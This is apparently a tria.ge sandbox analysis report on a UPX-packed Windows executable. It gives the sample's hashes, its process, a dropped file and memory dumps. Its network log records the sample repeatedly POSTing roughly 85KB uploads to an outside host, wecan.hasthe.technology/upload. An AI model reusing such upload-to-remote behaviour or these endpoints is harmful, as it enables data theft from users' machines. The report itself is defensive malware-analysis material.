Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

7

Static

static

7

155a8c9723...cs.exe

windows7-x64

7

155a8c9723...cs.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    141s
  • max time network
    121s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09/06/2024, 07:11 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    155a8c972333ccc494b0b8dec791cb20_NeikiAnalytics.exe

  • Size

    83KB

  • MD5

    155a8c972333ccc494b0b8dec791cb20

  • SHA1

    2c939997cf63c8c82ea3c51885a98bf87edf069b

  • SHA256

    9c3cc9ed42cb14e3693c85f29b7b9a8acf08d4f98aa7352954b4534b0c5abb85

  • SHA512

    a296f6aa75df6856465cc52b3c0f5d1628ff930f6108dd06bc6c26ddaecaad019c5caaf2998c93ad805838fea15da6f3bd906a8bf9039d54e929e53c57b265db

  • SSDEEP

    1536:LJaPJpAz869DUxWB+i4OQ4NR2Kk+aSnfZaG8fcaOCzGquSE0cF+dK:LJ0TAz6Mte4A+aaZx8EnCGVud

Score
7/10
upx

Malware Config

Signatures

  • UPX packed file 7 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx

Processes

  • C:\Users\Admin\AppData\Local\Temp\155a8c972333ccc494b0b8dec791cb20_NeikiAnalytics.exe
    "C:\Users\Admin\AppData\Local\Temp\155a8c972333ccc494b0b8dec791cb20_NeikiAnalytics.exe"
    1⤵
      PID:4460

    Network

    • flag-us
      DNS
      196.249.167.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      196.249.167.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      14.160.190.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      14.160.190.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      203.107.17.2.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      203.107.17.2.in-addr.arpa
      IN PTR
      Response
      203.107.17.2.in-addr.arpa
      IN PTR
      a2-17-107-203deploystaticakamaitechnologiescom
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      154.239.44.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      154.239.44.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      wecan.hasthe.technology
      155a8c972333ccc494b0b8dec791cb20_NeikiAnalytics.exe
      Remote address:
      8.8.8.8:53
      Request
      wecan.hasthe.technology
      IN A
      Response
      wecan.hasthe.technology
      IN A
      172.67.183.40
      wecan.hasthe.technology
      IN A
      104.21.59.199
    • flag-us
      POST
      http://wecan.hasthe.technology/upload
      155a8c972333ccc494b0b8dec791cb20_NeikiAnalytics.exe
      Remote address:
      172.67.183.40:80
      Request
      POST /upload HTTP/1.1
      Host: wecan.hasthe.technology
      Accept: */*
      Content-Length: 85412
      Expect: 100-continue
      Content-Type: multipart/form-data; boundary=------------------------a85238db54ddede6
      Response
      HTTP/1.1 301 Moved Permanently
      Date: Sun, 09 Jun 2024 07:12:13 GMT
      Content-Type: text/html
      Content-Length: 167
      Connection: keep-alive
      Cache-Control: max-age=3600
      Expires: Sun, 09 Jun 2024 08:12:13 GMT
      Location: https://computernewb.com/collab-vm/
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M7LgNe8PImy2%2FjXtGfAFZGys%2FHyYZ1CDnV%2F1K12hcn4taCeaoppwF5PXJgFMmNMDYiO02rSmOo5ho7ncNW%2FW%2BzCRVgBFiMP8A6SJiYwrgp2LDbn095WlRCf%2BIUVyaTAzjm5nAyP8RFxVkQ%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 890f4fe33a398868-LHR
    • flag-us
      DNS
      183.59.114.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      183.59.114.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      40.183.67.172.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      40.183.67.172.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      56.126.166.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      56.126.166.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      POST
      http://wecan.hasthe.technology/upload
      155a8c972333ccc494b0b8dec791cb20_NeikiAnalytics.exe
      Remote address:
      172.67.183.40:80
      Request
      POST /upload HTTP/1.1
      Host: wecan.hasthe.technology
      Accept: */*
      Content-Length: 85412
      Expect: 100-continue
      Content-Type: multipart/form-data; boundary=------------------------7420f119d723243b
      Response
      HTTP/1.1 301 Moved Permanently
      Date: Sun, 09 Jun 2024 07:12:43 GMT
      Content-Type: text/html
      Content-Length: 167
      Connection: keep-alive
      Cache-Control: max-age=3600
      Expires: Sun, 09 Jun 2024 08:12:43 GMT
      Location: https://computernewb.com/collab-vm/
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gTw9OrRsbsYl77hPRvn1X%2FmUIIJllk4u3VFdqUPyx%2FemBWZvBsagbhtQT7u4GUErzhjW0U2vb5m%2FDeiBrcTbpfQUs4EfBnR41%2BSL4tvRqZxuI5sLpmTs6wLeYktc43MiYZq53IdI5uVQ1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 890f509f6b226536-LHR
    • flag-us
      DNS
      172.210.232.199.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      172.210.232.199.in-addr.arpa
      IN PTR
      Response
    • flag-us
      POST
      http://wecan.hasthe.technology/upload
      155a8c972333ccc494b0b8dec791cb20_NeikiAnalytics.exe
      Remote address:
      172.67.183.40:80
      Request
      POST /upload HTTP/1.1
      Host: wecan.hasthe.technology
      Accept: */*
      Content-Length: 85412
      Expect: 100-continue
      Content-Type: multipart/form-data; boundary=------------------------f79ec36761d959f8
      Response
      HTTP/1.1 301 Moved Permanently
      Date: Sun, 09 Jun 2024 07:13:13 GMT
      Content-Type: text/html
      Content-Length: 167
      Connection: keep-alive
      Cache-Control: max-age=3600
      Expires: Sun, 09 Jun 2024 08:13:13 GMT
      Location: https://computernewb.com/collab-vm/
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IANVeOsTim7NXGafjUjdRqejKnvvM7W4AsaD3upuKvXVUa6XPtEFlc5OaXMJTIJMVqlCsyp5jKRegkXtx4tium%2FD73VlyPW%2Fix7VQ31B4m3n5Q%2BF9rRlPP6ouJ6SZhJsq0dRFOCFE492VQ%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 890f515baf6623c6-LHR
    • flag-us
      POST
      http://wecan.hasthe.technology/upload
      155a8c972333ccc494b0b8dec791cb20_NeikiAnalytics.exe
      Remote address:
      172.67.183.40:80
      Request
      POST /upload HTTP/1.1
      Host: wecan.hasthe.technology
      Accept: */*
      Content-Length: 85412
      Expect: 100-continue
      Content-Type: multipart/form-data; boundary=------------------------b24cf271c27f82ea
      Response
      HTTP/1.1 301 Moved Permanently
      Date: Sun, 09 Jun 2024 07:13:43 GMT
      Content-Type: text/html
      Content-Length: 167
      Connection: keep-alive
      Cache-Control: max-age=3600
      Expires: Sun, 09 Jun 2024 08:13:43 GMT
      Location: https://computernewb.com/collab-vm/
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LEnA4Jca86BHrG8f78MTJD1xGUZkN%2Fwf1FLJVOi1j0cJ%2F3dVMyo3lGaHCDhUHhZtLv7Bj3NvqetP94MNgzEIN18K779HN0W23QKti%2FjR9nG4d2TsK%2BXcfS8PPuwvRyKQ6dWMfY8UEX0y9w%3D%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 890f5217db0d067e-LHR
    • 172.67.183.40:80
      http://wecan.hasthe.technology/upload
      http
      155a8c972333ccc494b0b8dec791cb20_NeikiAnalytics.exe
      14.6kB
       1.4kB
       15
      13

      HTTP Request

      POST http://wecan.hasthe.technology/upload

      HTTP Response

      301
    • 172.67.183.40:80
      http://wecan.hasthe.technology/upload
      http
      155a8c972333ccc494b0b8dec791cb20_NeikiAnalytics.exe
      14.6kB
       1.4kB
       15
      14

      HTTP Request

      POST http://wecan.hasthe.technology/upload

      HTTP Response

      301
    • 172.67.183.40:80
      http://wecan.hasthe.technology/upload
      http
      155a8c972333ccc494b0b8dec791cb20_NeikiAnalytics.exe
      14.6kB
       1.5kB
       15
      16

      HTTP Request

      POST http://wecan.hasthe.technology/upload

      HTTP Response

      301
    • 172.67.183.40:80
      http://wecan.hasthe.technology/upload
      http
      155a8c972333ccc494b0b8dec791cb20_NeikiAnalytics.exe
      14.6kB
       1.5kB
       15
      17

      HTTP Request

      POST http://wecan.hasthe.technology/upload

      HTTP Response

      301
    • 8.8.8.8:53
      196.249.167.52.in-addr.arpa
      dns
      73 B
       147 B
       1
      1

      DNS Request

      196.249.167.52.in-addr.arpa

    • 8.8.8.8:53
      203.107.17.2.in-addr.arpa
      dns
      71 B
       135 B
       1
      1

      DNS Request

      203.107.17.2.in-addr.arpa

    • 8.8.8.8:53
      14.160.190.20.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      14.160.190.20.in-addr.arpa

    • 8.8.8.8:53
      95.221.229.192.in-addr.arpa
      dns
      73 B
       144 B
       1
      1

      DNS Request

      95.221.229.192.in-addr.arpa

    • 8.8.8.8:53
      154.239.44.20.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      154.239.44.20.in-addr.arpa

    • 8.8.8.8:53
      wecan.hasthe.technology
      dns
      155a8c972333ccc494b0b8dec791cb20_NeikiAnalytics.exe
      69 B
       101 B
       1
      1

      DNS Request

      wecan.hasthe.technology

      DNS Response

      172.67.183.40
      104.21.59.199

    • 8.8.8.8:53
      183.59.114.20.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      183.59.114.20.in-addr.arpa

    • 8.8.8.8:53
      40.183.67.172.in-addr.arpa
      dns
      72 B
       134 B
       1
      1

      DNS Request

      40.183.67.172.in-addr.arpa

    • 8.8.8.8:53
      56.126.166.20.in-addr.arpa
      dns
      72 B
       158 B
       1
      1

      DNS Request

      56.126.166.20.in-addr.arpa

    • 8.8.8.8:53
      172.210.232.199.in-addr.arpa
      dns
      74 B
       128 B
       1
      1

      DNS Request

      172.210.232.199.in-addr.arpa

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\rifaien2-Z1MPgG8QAR9cLHTj.exe
      Filesize

      83KB

      MD5

      7cf663433ab3bf51ff4048f2e2de08fd

      SHA1

      7c85aea035c618b2f513339a66f168cfba1c862b

      SHA256

      6918c2a289b6efe5f8ee64afedbc8394055401b1fc0955acc5c4551d67c044d0

      SHA512

      1df772e07bc36e16197f920c32b3c60485b090285e877c3c2ce11c7e4a3391bfdfd6a3d6b0a52101c662e14d4e5ec5df111932b1cd7664c8e15db01e72d696ae

      Download Submit

    • memory/4460-0-0x0000000000400000-0x000000000042A000-memory.dmp

      Filesize

      168KB

      Download

    • memory/4460-1-0x0000000000400000-0x000000000042A000-memory.dmp

      Filesize

      168KB

      Download

    • memory/4460-7-0x0000000000400000-0x000000000042A000-memory.dmp

      Filesize

      168KB

      Download

    • memory/4460-14-0x0000000000400000-0x000000000042A000-memory.dmp

      Filesize

      168KB

      Download

    • memory/4460-21-0x0000000000400000-0x000000000042A000-memory.dmp

      Filesize

      168KB

      Download

    • memory/4460-29-0x0000000000400000-0x000000000042A000-memory.dmp

      Filesize

      168KB

      Download

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.